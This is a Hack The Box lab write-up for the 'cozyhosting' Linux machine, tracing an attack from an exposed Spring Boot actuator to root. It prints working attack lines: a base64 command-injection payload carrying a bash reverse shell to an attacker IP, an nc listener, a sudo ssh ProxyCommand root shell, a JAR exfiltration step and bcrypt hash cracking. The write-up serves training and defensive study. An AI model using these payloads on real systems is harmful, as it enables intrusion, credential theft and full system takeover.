HTB: cozyhosting Writeup

Machine Information

Machine Rating

⭐⭐⭐⭐☆ (7.5/10)

Difficulty Assessment:

• Enumeration: ⭐⭐⭐☆☆
• Real-world Applicability: ⭐⭐⭐⭐☆
• CVE Knowledge: ⭐⭐☆☆☆
• CTF-like Elements: ⭐⭐⭐☆☆

Summary

cozyhosting is an Easy-difficulty Linux machine that demonstrates the dangers of exposed Spring Boot Actuator endpoints and insecure session management. The exploitation chain involves discovering an exposed /actuator/sessions endpoint, hijacking authenticated user sessions, exploiting a command injection vulnerability in an SSH utility function, extracting database credentials from a decompiled JAR file, cracking bcrypt password hashes, and finally leveraging an overly permissive sudo configuration for privilege escalation to root.

TL;DR: Spring Boot Actuator exposure → Session hijacking → Command injection → Database credential extraction → Hash cracking → SSH sudo exploit → Root access.

Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.129.106.247

Results:

22/tcp  open  ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     nginx 1.18.0 (Ubuntu)

Service Enumeration

Hostname Configuration:

echo "10.129.106.247 cozyhosting.htb" >> /etc/hosts

Web Service Discovery

Navigating to http://cozyhosting.htb revealed a Spring Boot application with a login page. Using directory enumeration tools:

feroxbuster -u http://cozyhosting.htb -w /usr/share/wordlists/common.txt -x txt,html,php,js

or

dirsearch -u http://cozyhosting.htb -w /usr/share/wordlists/common.txt

Key Findings:

• /actuator - Spring Boot Actuator endpoints exposed
• /actuator/sessions - Exposed session data containing active user sessions
• /login - Application login page
• /dashboard - Restricted dashboard area

Initial Foothold

Spring Boot Actuator Exploitation

Spring Boot applications often expose the /actuator endpoint in development or misconfigured production environments. This endpoint provides sensitive information including:

• Running environment details
• Configuration properties
• Active sessions
• Health status

Accessing /actuator/sessions revealed active user sessions with session IDs (PHPSID cookies):

curl -s http://cozyhosting.htb/actuator/sessions | jq .

Session Hijacking

The endpoint output contained valid session tokens. By extracting a PHPSID cookie from an active session:

PHPSID: <VALID_SESSION_ID>

This session could be used to access restricted areas of the application:

curl -b "PHPSID=<VALID_SESSION_ID>" http://cozyhosting.htb/dashboard

Dashboard Reconnaissance

Once authenticated via session hijacking, the /dashboard endpoint revealed an SSH utility function that accepted user input:

• Host parameter: Target SSH server hostname/IP
• Username parameter: SSH username for authentication

Command Injection Vulnerability

The SSH function did not properly sanitize the username parameter, allowing shell command injection. Testing with various payloads revealed the application filtered certain characters and used IFS (Internal Field Separator) bypass techniques.

Working Payload with IFS Bypass:

The username field accepted:

;echo${IFS}"<BASE64_ENCODED_PAYLOAD>"|base64${IFS}-d|bash;

Where ${IFS} is a bash variable substitution bypass for spaces, preventing signature-based filtering.

Reverse Shell Generation

Generate a base64-encoded reverse shell payload:

echo 'bash -i >& /dev/tcp/10.10.14.XX/4444 0>&1' | base64

Set up the listener:

nc -lvnp 4444

Craft the injection payload in the username field:

;echo${IFS}"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC5YWC80NDQ0IDA+JjE="|base64${IFS}-d|bash;

Shell Stabilization

Upon receiving the reverse shell connection:

python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

This grants an interactive shell as the app user.

User Compromise

JAR File Extraction and Decompilation

The application is a Spring Boot application running from a compiled JAR file. Located the JAR:

find / -name "*.jar" -type f 2>/dev/null

Found the application JAR at /app/cozyhosting.jar (or similar location).

Exfiltrate the JAR file using Python’s HTTP server:

# On target
cd /app
python3 -m http.server 8000

# On attacker machine
wget http://10.129.106.247:8000/cozyhosting.jar

Decompilation with jd-gui

Use jd-gui to decompile the JAR:

jd-gui cozyhosting.jar

Searched the decompiled code for hardcoded credentials or database connection strings. Found PostgreSQL credentials in the application configuration:

Database User: postgres (or similar)
Database Password: <DATABASE_PASSWORD>
Database: cozyhosting
Host: localhost
Port: 5432

PostgreSQL Credential Extraction

Connected to the PostgreSQL database using the extracted credentials:

psql -h localhost -U postgres -d cozyhosting

Enumerated database tables:

\dt

Located the users table containing admin credentials:

SELECT * FROM users;

Output showed bcrypt password hashes for the admin user. Example hash format:

$2a$10$[BCRYPT_HASH_STRING]

Hash Cracking with hashcat

Extract the bcrypt hash and crack it using hashcat:

hashcat -m 3200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

• -m 3200: bcrypt hash mode
• -a 0: Dictionary attack

Result: Password cracked as manchesterunited

SSH Access as josh

With the cracked credentials, authenticate via SSH:

ssh josh@10.129.106.247
Password: manchesterunited

User Flag

cat ~/user.txt

🚩 User Flag: <REDACTED>

Privilege Escalation

Sudo Enumeration

Check sudo permissions for the current user:

sudo -l

Output:

User josh may run the following commands on cozyhosting:
    (root) /usr/bin/ssh

The user is allowed to run /usr/bin/ssh as root without requiring a password.

SSH Privilege Escalation (GTFOBins)

SSH has a -o ProxyCommand option that executes arbitrary shell commands. This is documented in GTFOBins as a privilege escalation vector when SSH can be run as root.

Execute the exploit:

sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

Explanation:

• ProxyCommand: SSH option to execute a command before establishing connection
• ;sh 0<&2 1>&2: Shell command executed as root
  • ; - Command separator
  • sh - Invoke shell
  • 0<&2 1>&2 - Redirect file descriptors (stdin from stderr, stdout to stderr)
• x - Arbitrary host parameter

This immediately spawns a root shell.

Root Flag

cat /root/root.txt

🚩 Root Flag: <REDACTED>

Attack Chain Summary

graph TD
    A["Port Scan: 22/SSH, 80/HTTP"] --> B["Discover Spring Boot Actuator"]
    B --> C["Access /actuator/sessions"]
    C --> D["Hijack PHPSID Session Cookie"]
    D --> E["Access /dashboard"]
    E --> F["Command Injection via Username Field"]
    F --> G["Reverse Shell as app User"]
    G --> H["Extract JAR File"]
    H --> I["Decompile with jd-gui"]
    I --> J["Find PostgreSQL Credentials"]
    J --> K["Access Database & Extract Hashes"]
    K --> L["Crack Bcrypt Hash - manchesterunited"]
    L --> M["SSH as josh User"]
    M --> N["Enumerate sudo -l"]
    N --> O["SSH ProxyCommand Exploit"]
    O --> P["Root Shell"]

Vulnerability Reference Table

Tools Used

Key Learnings

1. Spring Boot Actuator Dangers: Always disable or properly secure Spring Boot Actuator endpoints in production. The /actuator/sessions endpoint exposed active user sessions, enabling session hijacking attacks.

2. Session Security Matters: Even authenticated users require protected session tokens. Implement secure cookie flags (httpOnly, Secure, SameSite) and rotate sessions regularly.

3. Input Validation is Critical: The command injection vulnerability in the username parameter demonstrates the importance of strict input validation. Using IFS bypass (${IFS}) bypassed simple character-based filtering.

4. Decompilation Reveals Secrets: Compiled applications can be decompiled to extract hardcoded credentials, database connection strings, and other sensitive information. Never hardcode secrets; use environment variables or secure vaults.

5. Database Credential Importance: Once database credentials are obtained, extracting user hashes becomes trivial. Strong password policies and secure hash iterations are essential.

6. Sudo Misconfigurations Lead to Root: Allowing powerful commands like /usr/bin/ssh to run as root without careful restrictions creates direct privilege escalation paths. Always apply the principle of least privilege.

7. Defense in Depth is Essential: This machine required multiple layers of exploitation. A single fix (e.g., disabling Actuator) would have prevented the entire chain.

Author

D3vnomi

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal. The techniques and vulnerabilities discussed should only be used in authorized penetration testing engagements or on systems you own or have explicit permission to test.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Easy #SpringBoot #SessionHijacking #CommandInjection #PrivilegeEscalation